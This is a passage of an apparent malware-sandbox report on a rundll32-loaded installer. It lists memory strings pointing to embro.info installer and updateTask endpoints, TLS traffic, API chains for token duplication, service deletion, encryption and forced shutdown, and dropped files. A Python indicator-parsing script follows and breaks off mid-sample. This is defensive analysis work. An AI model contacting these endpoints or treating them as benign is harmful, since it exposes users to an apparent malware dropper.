Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000003.1428375584.0000026B78266000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1425857973.0000026B7825A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000000.00000002.1446453851.0000026B78268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418388349.0000026B78267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446191210.0000026B7822B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000000.00000003.1428375584.0000026B78266000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446297264.0000026B7823F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000000.00000002.1446313458.0000026B78242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000002.1446424516.0000026B78263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446424516.0000026B78263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1446424516.0000026B78263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1446313458.0000026B78242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418560381.0000026B7825E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1419169080.0000026B7825D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000002.1446453851.0000026B78268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418388349.0000026B78267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428145464.0000026B7822D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004CE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529987679.0000000005305000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/
Source: rundll32.exe, 00000006.00000003.1531585454.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532207523.0000000002E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/-
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/0-3AEA-1069-A2D8-08002B30309D
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004CE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/I
Source: rundll32.exe, 0000000F.00000002.1529987679.00000000052A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/S
Source: rundll32.exe, 0000000F.00000002.1529987679.00000000052A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/U
Source: rundll32.exe, 00000006.00000003.1382967097.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/X~
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004CE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/_
Source: rundll32.exe, 0000000F.00000002.1529987679.0000000005305000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/a
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer.php
Source: rundll32.exe, 00000006.00000003.1531585454.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532997737.0000000004D48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532207523.0000000002E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer.php?pixid=2&campaignId=&firstrun=1&bg=1&cmdline=%22C%3A%5CUsers%5Cfront
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004CE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer.php?pixid=2&campaignId=&firstrun=1&bg=1&cmdline=C%3A%5CUsers%5Cuseres
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/finish
Source: rundll32.exe, 0000000F.00000002.1529987679.0000000005305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529987679.00000000052E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C5
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=ErR
Source: rundll32.exe, 00000006.00000002.1533859291.00000000055E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/finishixid=2&campaignId=&firstrun=1&bg=1&cmdline=%22C%3A%5CUsers%5Cfron
Source: rundll32.exe, 00000007.00000002.1508638447.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/finishixid=2&campaignId=&firstrun=1&bg=1&cmdline=C%3A%5CUsers%5Cusere
Source: rundll32.exe, 00000006.00000002.1532177913.0000000002E32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1531480442.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507561144.0000000002D02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1507087077.0000000002D01000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/get_timestamp.php
Source: rundll32.exe, 00000007.00000002.1507561144.0000000002D02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1507087077.0000000002D01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/get_timestamp.php./
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/get_timestamp.php1023
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/start500
Source: rundll32.exe, 00000006.00000003.1382772442.0000000004D84000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532997737.0000000004D48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532997737.0000000004D23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1508449489.0000000004CD1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1508449489.0000000004C80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529987679.00000000052A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/j
Source: rundll32.exe, rundll32.exe, 00000027.00000002.1446783379.000001C9C8530000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.1464421881.0000022638F20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000002.1464566083.000001A893280000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000002.1465060549.00000265DD1F0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://embro.info/updateTask/index.php
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ss
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.v
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualea0D#xk
Source: svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1426967132.0000026B78249000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446270438.0000026B78235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000003.1428145464.0000026B7822D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446191210.0000026B7822B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A664C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 6_2_046A664C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B1420 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 39_2_000001C9C85B1420
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9773420 OpenSCManagerA,OpenServiceW,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle, 33_2_0000021BD9773420
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD978B1D0 WTSQueryUserToken,GetCurrentProcess,OpenProcessToken,WTSQueryUserToken,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,DuplicateTokenEx,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,CloseHandle,CloseHandle, 33_2_0000021BD978B1D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A1130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 6_2_046A1130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E1130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 7_2_045E1130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03451130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 15_2_03451130
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}\c23a32abd836342a70b7f6c1aa74947e.2.E
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}\c23a32abd836342a70b7f6c1aa74947e.2
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}\66f120532d0318a6a449e3c438427a15.2
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}\66f120532d0318a6a449e3c438427a15.2.E
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}\2e04d05a72bbb297aebc410e888a6ad5
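The URL strings, the TLS peer, the API call chains and the created files listed above are the pieces an analyst pulls out of a report like this first. The script below is an added example, not anything Joe Sandbox ships: it parses lines in this page's format into a small IOC set, attributes each URL to the process number encoded in the memory-dump name (the same number the "Code function: 7_2_..." ids carry), and tags API chains that match a few technique signatures. The signature table and the choice to treat the Bing Maps (virtualearth.net, ditu.live.com) and curl.se endpoints as noise are my assumptions, and the embedded sample is a constructed subset of this page's own lines, with the longest source lists shortened.

```python
"""Parse Joe Sandbox behaviour lines into IOCs and API-chain techniques.
Added example, not Joe Sandbox code; signatures and benign-host suffixes are assumptions."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from urllib.parse import urlsplit

URL_RE = re.compile(r"^Source: (?P<src>.+?) String found in binary or memory: (?P<url>\S+)$")
TLS_RE = re.compile(r"^Source: unknown HTTPS traffic detected: (?P<rip>[\d.]+):(?P<rport>\d+)"
                    r" -> (?P<lip>[\d.]+):(?P<lport>\d+) version: (?P<ver>.+)$")
# 'Code function: <id> api1,api2,..., <id>'; lines that list no APIs deliberately do not match
FUNC_RE = re.compile(r"^Source: \S+ Code function: (?P<fid>\S+) (?P<apis>[\w#]+(?:,[\w#]+)*),? (?P=fid)$")
FILE_RE = re.compile(r"^Source: \S+ File created: (?P<path>.+?)(?: Jump to behavior)?$")  # HTML adds a link label
# Dump names start with the process number Joe Sandbox assigns in the analysis (hex)
DUMP_RE = re.compile(r"^[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\.")

# Assumption: Bing Maps control endpoints (seen only in svchost.exe here) and curl docs are noise
LIKELY_BENIGN_SUFFIXES = ("virtualearth.net", "ditu.live.com", "curl.se")
# Assumption: API subsets (A/W suffix stripped) that characterise a technique
TECHNIQUES = {
    "create-process-as-user": {"WTSQueryUserToken", "DuplicateTokenEx", "CreateProcessAsUser"},
    "delete-service": {"OpenSCManager", "DeleteService"},
    "cryptoapi-encrypt": {"CryptImportKey", "CryptEncrypt"},
    "exit-windows": {"AdjustTokenPrivileges", "ExitWindowsEx"},
    "clipboard-write": {"OpenClipboard", "SetClipboardData"},
}

@dataclass
class Report:
    hosts: dict = field(default_factory=lambda: defaultdict(set))  # host -> {"proc[num]"}
    tls_peers: set = field(default_factory=set)                     # (ip, port, version)
    techniques: list = field(default_factory=list)                  # (function id, technique)
    dropped: list = field(default_factory=list)                     # created file paths

def _sources(src: str) -> set:
    """'rundll32.exe, 00000007.<dump>, rundll32.exe' -> {'rundll32.exe[7]', 'rundll32.exe'}."""
    out, pending, last = set(), None, None
    for tok in src.split(", "):
        if tok.lower().endswith(".exe"):
            if pending:                      # a bare process name with no dump after it
                out.add(pending)
            pending = last = tok
        elif DUMP_RE.match(tok) and last:
            out.add(f"{last}[{int(tok[:8], 16)}]")
            pending = None
    if pending:
        out.add(pending)
    return out

def _norm(api: str) -> str:
    """Drop the ANSI/Unicode suffix so CreateProcessAsUserW and OpenSCManagerA match the table."""
    return re.sub(r"(?<=[a-z0-9])[AW]$", "", api)

def techniques_for(apis) -> list:
    seen = {_norm(a) for a in apis}
    return [name for name, sig in TECHNIQUES.items() if sig <= seen]

def parse_report(text: str) -> Report:
    r = Report()
    for line in text.splitlines():
        line = line.strip()
        if m := URL_RE.match(line):
            host = urlsplit(m["url"]).hostname or m["url"]
            r.hosts[host] |= _sources(m["src"])
        elif m := TLS_RE.match(line):
            r.tls_peers.add((m["rip"], int(m["rport"]), m["ver"]))
        elif m := FUNC_RE.match(line):
            r.techniques += [(m["fid"], t) for t in techniques_for(m["apis"].split(","))]
        elif m := FILE_RE.match(line):
            r.dropped.append(m["path"])
    return r

def suspicious_hosts(r: Report) -> dict:
    """Everything not on the benign list, including truncated fragments such as 'dynamic.t'."""
    return {h: p for h, p in r.hosts.items() if not h.endswith(LIKELY_BENIGN_SUFFIXES)}

# Constructed sample: lines from this report (some source lists shortened) so the script runs offline
SAMPLE = r"""
Source: rundll32.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004CE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529987679.0000000005305000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/
Source: rundll32.exe, rundll32.exe, 00000027.00000002.1446783379.000001C9C8530000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.1464421881.0000022638F20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://embro.info/updateTask/index.php
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000000.00000003.1419169080.0000026B7825D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B1420 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 39_2_000001C9C85B1420
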